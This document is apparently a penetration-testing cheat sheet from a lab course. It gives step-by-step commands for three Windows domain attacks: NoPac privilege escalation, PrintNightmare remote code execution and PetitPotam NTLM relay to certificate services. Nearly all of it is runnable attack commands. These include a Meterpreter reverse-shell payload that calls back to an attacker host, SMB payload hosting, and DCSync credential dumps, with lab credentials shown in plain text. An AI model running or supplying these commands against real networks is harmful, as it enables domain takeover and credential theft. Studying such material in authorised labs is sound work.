22.Bleeding Edge Vulnerabilities

I. NoPac (SamAccountName Spoofing) - Domain Privilege Escalation

Purpose: Exploits CVE-2021-42278 and CVE-2021-42287 to elevate privileges to Domain Admin.

Impacket Setup (Required Dependencies)

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
python3 setup.py install

NoPac Tool Retrieval

git clone https://github.com/Ridter/noPac.git
cd noPac

Vulnerability Scanning

sudo python3 scanner.py inlanefreight.local/forend:Klmcargo2 -dc-ip 172.16.5.5 -use-ldap

(Checks if the target domain controller is vulnerable)

Interactive Shell as SYSTEM

sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap

(Gains a shell with NT AUTHORITY\SYSTEM privileges)

DCSync (Domain Credential Extraction)

sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump -just-dc-user INLANEFREIGHT/administrator

(Extracts domain credentials using DCSync)

Checking for Created Files

ls

(Verifies the creation of .ccache files)

---

II. PrintNightmare (Print Spooler Vulnerability) - Remote Code Execution

Purpose: Exploits CVE-2021-34527 and CVE-2021-1675 to gain SYSTEM-level remote access.

Exploit Retrieval

git clone https://github.com/cube0x0/CVE-2021-1675.git
cd CVE-2021-1675

Impacket Setup (cube0x0 Version)

pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install

Service Enumeration

rpcdump.py @172.16.5.5 | egrep 'MS-RPRN|MS-PAR'

(Verifies the Print Spooler service is active)

Payload Generation (Metasploit)

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.225 LPORT=8080 -f dll > backupscript.dll

(Creates a reverse TCP Meterpreter payload)

SMB Share Setup

sudo smbserver.py -smb2support CompData /path/to/backupscript.dll

(Hosts the DLL payload on an SMB share)

Metasploit Listener Setup

msfconsole
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 172.16.5.225
set LPORT 8080
run

(Starts a listener to catch the reverse shell)

Exploit Execution

sudo python3 CVE-2021-1675.py inlanefreight.local/forend:Klmcargo2@172.16.5.5 '\\172.16.5.225\CompData\backupscript.dll'

(Triggers the Print Spooler vulnerability)

Meterpreter Interaction

shell
whoami

(Drops into a SYSTEM shell)

---

III. PetitPotam (MS-EFSRPC) - Domain Compromise via NTLM Relay

Purpose: Exploits CVE-2021-36942 to coerce domain controller authentication for NTLM relay to AD CS.

NTLM Relay Setup

sudo ntlmrelayx.py -debug -smb2support --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController

(Starts ntlmrelayx to relay authentication to AD CS)

Authentication Coercion

python3 PetitPotam.py 172.16.5.225 172.16.5.5

(Triggers the domain controller to authenticate)

TGT Request (PKINITtools)

python3 /opt/PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01\$ -pfx-base64 MIIStQIBAzCCEn8GCSqGSI...SNIP...CKBdGmY= dc01.ccache

(Requests a TGT for the domain controller)

KRB5CCNAME Setup

export KRB5CCNAME=dc01.ccache

(Sets the Kerberos ticket cache)

DCSync (Credential Extraction)

secretsdump.py -just-dc-user INLANEFREIGHT/administrator -k -no-pass "ACADEMY-EA-DC01$"@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL

(Extracts domain credentials using DCSync)